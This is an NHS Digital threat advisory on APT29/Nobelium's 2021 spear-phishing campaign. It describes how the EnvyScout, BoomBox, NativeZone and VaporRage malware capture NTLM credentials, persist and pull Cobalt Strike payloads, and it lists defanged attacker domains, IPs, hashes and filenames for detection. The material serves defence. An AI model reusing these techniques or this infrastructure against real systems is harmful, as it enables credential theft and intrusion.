Skip to main content

Nobelium Advanced Spear-Phishing Campaign

Nobelium, also known as APT29, are conducting a sophisticated spear-phishing campaign against government and non-government organisations throughout the West. Their goal appears to be the delivery of four separate malware families: EnvyScout, BoomBox, NativeZone, and VaporRage.

Report a cyber attack: call 0300 303 5222 or email carecert@nhsdigital.nhs.uk

Summary

Nobelium, also known as APT29, are conducting a sophisticated spear-phishing campaign against government and non-government organisations throughout the West. Their goal appears to be the delivery of four separate malware families: EnvyScout, BoomBox, NativeZone, and VaporRage.


Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

A new campaign by the Nobelium advanced persistent threat group has been identified. Beginning in February this year, the group appear to be targeting western government agencies as well as human rights and international development organisations with spear-phishing attacks to deliver four separate payloads: EnvyScout, BoomBox, NativeZone, and VaporRage.


Delivery

Nobelium has used several distinct waves of spear-phishing attacks during this campaign, adjusting them as their objectives change.

The first wave seen in early February contained a link to a Google Firebase page staging an ISO file. This wave appears to have been used solely to profile targets using Firebase’s inbuilt metrics.

The next wave then used an HTML attachment, EnvyScout, to deliver the ISO file whilst still using Firebase for target tracking. Several variations of this wave were seen, including one that embedded the ISO within the HTML file, while another redirected the attachment to an RTF document with an embedded Dynamic-link Library (DLL) file. Another variant directed users to a Nobelium-controlled website where the ISO file would be dropped.

In April 2021, Nobelium appeared to refine their approach, focusing on EnvyScout delivering an embedded ISO file, and dropping Firebase for a target-tracking mechanism built into EnvyScout. Following this change, the began using a legitimate mass-mailing service to deliver emails to more than 150 target organisations.

EnvyScout

EnvyScout is a dropper distributed as a malicious HTML/JS attachment. On opening, Envy Scout loads an image from a file:// URL, in an attempt to prompt the affected system into sending the user’s NTLM credentials to a remote site. This suggests Nobelium is operating a credential capturing service and could use brute-force attacks against captured credentials to discover the user’s password for later use. A second URL loads an image as a means of providing confirmation to Nobelium that the target has opened the attachment.

EnvyScout contains an embedded ISO file which it writes to disk on the user’s machine. Prior to writing the ISO file to disk, Envy Scout may perform additional checks on the host system. Some variants contain a JavaScript windows.location.path call to check that it is being executed from the C: drive, terminating if not. Other variants check the browser environment, using user-agent information to determine the host operating system (OS), redirecting the user to an external site if iOS is detected.

When the user opens the ISO file, Windows mounts it as a drive, assigning it an available drive letter. The mounted ISO contains:

  • A hidden file named boom.exe
  • A hidden folder containing a decoy PDF document
  • A visible LNK shortcut used to launch boom.exe

BoomBox

BoomBox is a malicious downloader launched when the user clicks on LNK file contained in the mounted ISO file.  It downloads two encrypted malware files from Dropbox - NativeZone and VaporRage. If the download was successful, it will gather user and system information to enumerate the user’s computer. After downloading and decrypting the two files, BoomBox drops a PDF file named NV.pdf in a directory on the mounted ISO. It then creates a Run registry value named MicroNativeCacheSvc to establish persistence so that NativeZone will automatically launch when a user logs into Windows.

The final step involves BoomBox executing an LDAP query if the system is domain-joined. This will gather data including the SAM account name, email, and display name of all domain users. Following this, BoomBox uploads this data to a dedicated system folder in Dropbox. BoomBox uses a set of regular expressions to ensure that the file has been successfully uploaded to Dropbox.

NativeZone

NativeZone is a custom Cobalt Strike loader module used to decode and deploy Cobalt Strike Beacon modules, in this case VaporRage. Like older Nobelium loaders such as Teardrop and Raindrop, certain NativeZone variants have anti-analysis functionality.

VaporRage

VaporRage is a Cobalt Strike Beacon payload that is used as a shellcode downloader. It first ensures that NativeZone is present on the system before registering itself as a compromised system to a Nobelium-controlled website and downloading an XOR-encoded shellcode blob. This blob is then decoded and executed in memory.

VaporRage will continue to look for blobs, including Cobalt Strike stage shellcode, approximately once an hour until it is unloaded from memory.


Remediation advice

To prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.


Indicators of compromise

EnvyScout

Domains

  • eventbrite-com-default-rtdb[.]firebaseio[.]com
  • humanitarian-forum-default-rtdb[.]firebaseio[.]com
  • security-updater-default-rtdb[.]firebaseio[.]com

SHA256 hashes

  • 065e9471fb4425ec0b3a2fd15e1546d66002caca844866b0764cbf837c21a72a
  • 279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11
  • 2836e5553e1ae52a1591545b362d1a630e3fef7e6b7e8342a84008fe4a6473a9
  • 6df1d7191f6dd930642cc5c599efb54bfcc964b7a2e77f6007787de472b22a6a
  • 9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186
  • 9301e48ea3fa7d39df871f04072ee47b9046d76aa378a1c5697f3b2c14aef1d6
  • ca83d7456a49dc5b8fe71007e5ac590842b146dd5c45c9a65fe57e428a8bd7c6
  • cfb57906cf9c5e9c91bc4aa065f7997b1b32b88ff76f253a73ee7f6cfd8fff2f
  • f5bc4a9ffc2d33d4f915e41090af71544d84b651fb2444ac91f6e56c1f2c70d5
  • f7e8c9d19efd71f5c8217bf12bdd3f6c88d5f56ab65fea02dc2777c5402a18f1

Filenames

  • attachment.html
  • Attachment.html
  • information.html
  • Invitation.html
  • NV.html
  • nv.html
  • Reply slip.html
BoomBox

SHA256 hashes

  • 0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec
  • 8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27
  • cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c

Filenames

  • boom.exe
NativeZone

Domains

  • cdn[.]theyardservice[.]com
  • dataplane[.]theyardservice[.]com
  • doggroomingnews[.]com
  • static[.]theyardservice[.]com
  • worldhomeoutlet[.]com

SHA256 hashes

  • 136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d
  • 3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4
  • 4fbfeb7a0bb6b9841b92fa4e6b5a7bdb69c2a12ed39691c9495ff88cd6f58836
  • 656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb
  • b295c5ad4963bdffa764b93421c3dd512ca6733b79bdff2b99510e7d56a70935
  • ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330

Filenames

  • documents.dll
  • KM.FileSystem.dll
  • manual.pdf
  • NativeCacheSvc.dll (NativeZone)
  • Wbtr.dll
VaporRage

Domains

  • holescontracting[.]com
  • newsplacec[.]com

SHA256 hashes

  • 117317d623003995d639975774edd1bfe38cec7d24b22d3e48d22c91cf8636bb
  • 1c17c39af41a5d8f54441ce6b1cf925f6727a2ee9038284a8a7071c984d0460f
  • 23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f
  • b0bfe6a8aa031f7f5972524473f3e404f85520a7553662aaf886055007a57db5

Filenames

  • CertPKIProvider.dll (VaporRage)
  • mswsc.dll
  • readme.pdf
Network indicators

Domains

  • 139[.]99[.]167[.]177
  • 185[.]158[.]250[.]239
  • 195[.]206[.]181[.]169
  • 37[.]120[.]247[.]135
  • 45[.]135[.]167[.]27
  • 51[.]254[.]241[.]158
  • 51[.]38[.]85[.]225
  • 74d6b7b2[.]app[.]giftbox4u[.]com
  • aimsecurity[.]net
  • cdn[.]theyardservice[.]com
  • cdnappservice[.]firebaseio[.]com
  • cdnappservice[.]web[.]app 
  • cityloss[.]com
  • content[.]pcmsar[.]net
  • cross-checking[.]com
  • dailydews[.]com
  • dataplane[.]theyardservice[.]com
  • doggroomingnews[.]com
  • email[.]theyardservice[.]com
  • emergencystreet[.]com
  • enpport[.]com
  • eventbrite-com-default-rtdb[.]firebaseio[.]com
  • eventbrite-com-default-rtdb[.]firebaseio[.]com
  • financialmarket[.]org
  • giftbox4u[.]com
  • hanproud[.]com
  • holescontracting[.]com
  • https://r20[.]rs6[.]net/tn[.]jsp?<unique_to_target>
  • humanitarian-forum[.]web[.]app
  • humanitarian-forum-default-rtdb[.]firebaseio[.]com
  • logicworkservice[.]web[.]app
  • newsplacec[.]com
  • newstepsco[.]com
  • pcmsar[.]net
  • security-updater[.]web[.]app
  • security-updater-default-rtdb[.]firebaseio[.]com
  • smtp2[.]theyardservice[.]com
  • static[.]theyardservice[.]com
  • stockmarketon[.]com
  • stsnews[.]com
  • supportcdn[.]web[.]app
  • supportcdn-default-rtdb[.]firebaseio[.]com
  • tacomanewspaper[.]com
  • techiefly[.]com
  • theadminforum[.]com
  • theyardservice[.]com
  • trendignews[.]com
  • usaid[.]theyardservice[.]com
  • worldhomeoutlet[.]com
Host indicators

SHA256 hashes

  • 0c14a791f8a48d2944a9fa842f45becb7309ad004695e38f48fca69135d327c6
  • 112f92cfecdc4e177458bc1caebcc4420b5879840f137f249fac360ddac64ddd
  • 1f5a915e75ad96e560cee3e24861cf6f8de299fdf79e1829453defbfe2013239
  • 2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252
  • 292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8
  • 2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e
  • 2ebbb99b8dae0c7b0931190fa81add987b44d4435dafcf53a9cde0f19bb91398
  • 574b7a80d8b9791cb74608bc4a9fcba4e4574fafef8e57bdee340728445ebd16
  • 5f7d08eb2039a9d2e99ebf3d0ef2796b93d0a01e9b8ec403fec8fcdf46448693
  • 60e20576b08a24cdaeaabc4849011885fb7517713226e2663031d9533d2187bc
  • 60e20576b08a24cdaeaabc4849011885fb7517713226e2663031d9533d2187bc
  • 6e2069758228e8d69f8c0a82a88ca7433a0a71076c9b1cb0d4646ba8236edf23
  • 73ca0485f2c2c8ba95e00188de7f5509304e1c1eb20ed3a238b0aa9674f9104e
  • 749bf48a22ca161d86b6e36e71a6817b478a99d935cd721e8bf3dba716224c84
  • 776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b
  • 7a3b27cf04b7f8110fc1eee5f9c4830d38ac00467fc856330115af4bffaf35b6
  • 7bf3457087ea91164f86f4bb50ddb46c469c464c300228dba793f7bfe608c83e
  • 7d34f25ad8099bd069c5a04799299f17d127a3866b77ee34ffb59cfd36e29673
  • 7d34f25ad8099bd069c5a04799299f17d127a3866b77ee34ffb59cfd36e29673
  • 7ed1b6753c94250ad3c1c675eb644940c8104ff06a123252173c33cc1be5e434
  • 873717ea2ea01ae6cd2c2dca9d6f832a316a6e0370071bb4ee6ecff3163f8d18
  • 88c95954800827cb68e1efdacd99093f7f9646d82613039472b5c90e5978444d
  • 88c95954800827cb68e1efdacd99093f7f9646d82613039472b5c90e5978444d
  • 89016b87e97a07b4e0263a18827defdeaa3e150b1523534bbdebe7305beabb64
  • 94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916
  • 98473e1b8f7bedd5cfa3b83dad611db48eee23faec452e62797fb7752228c759
  • a45a77ad5c138a149aa71fb323a1e2513e7ac416be263d1783a7db380d06d2fc
  • a4f1f09a2b9bc87de90891da6c0fca28e2f88fd67034648060cef9862af9a3bf
  • bca5560a9a9dd54be76e4a8d63a66e9cfd731b0bd28524db05cc498bb5b56384
  • c4ff632696ec6e406388e1d42421b3cd3b5f79dcb2df67e2022d961d5f5a9e78
  • ca66b671a75bbee69a4a4d3000b45d5dc7d3891c7ee5891272ccb2c5aed5746c
  • d19ff098fe0f5947e08ec23be27d3a3355e14fb20135d8c4145126caa8be4b05
  • d37347f47bb8c7831ae9bb902ed27a6ce85ddd9ba6dd1e963542fd63047b829c
  • d37347f47bb8c7831ae9bb902ed27a6ce85ddd9ba6dd1e963542fd63047b829c
  • dcf48223af8bb423a0b6d4a366163b9308e9102764f0e188318a53f18d6abd25
  • e41a7616a3919d883beb1527026281d66e7bcdaff99600e462d36a58f1bdc794
  • f006af714379fdd63923536d908f916f4c55480f3d07adadd53d5807e0c285ee
  • f9a74ac540a6584fc3ba7ccc172f948c6b716cceea313ce1d9e7b735fa2a5687

Filenames

  • AktualizC!ciu.img
  • Attachment.img
  • attachment.img
  • attachment.iso
  • cert.html
  • desktop.dll
  • diassvcs.dll
  • dppy_empty.iso 
  • dxgim.dll
  • GraphicalComponent.dll
  • ica-declass.img
  • ICA-declass.iso
  • ica-declass.pdf
  • imgmountingservice.dll   
  • information.exe
  • information.iso
  • Invitation Document.iso
  • Java_SRE_runtime_update.dll
  • Meeting info.docx
  • msch.dll
  • msdiskmountservice.dll
  • mshost.dll
  • mstu.dll
  • nv.img
  • NV.img
  • nv.pdf
  • Reply slip.iso
  • reply slip.rtf
  • Reply slip.rtf
  • ScanClientUpdate.zip
  • SMM_Report.img
  • state ellection changes.docx
  • topics_of_discussion.iso
  • WRAR600.EX

Last edited: 4 June 2021 1:05 pm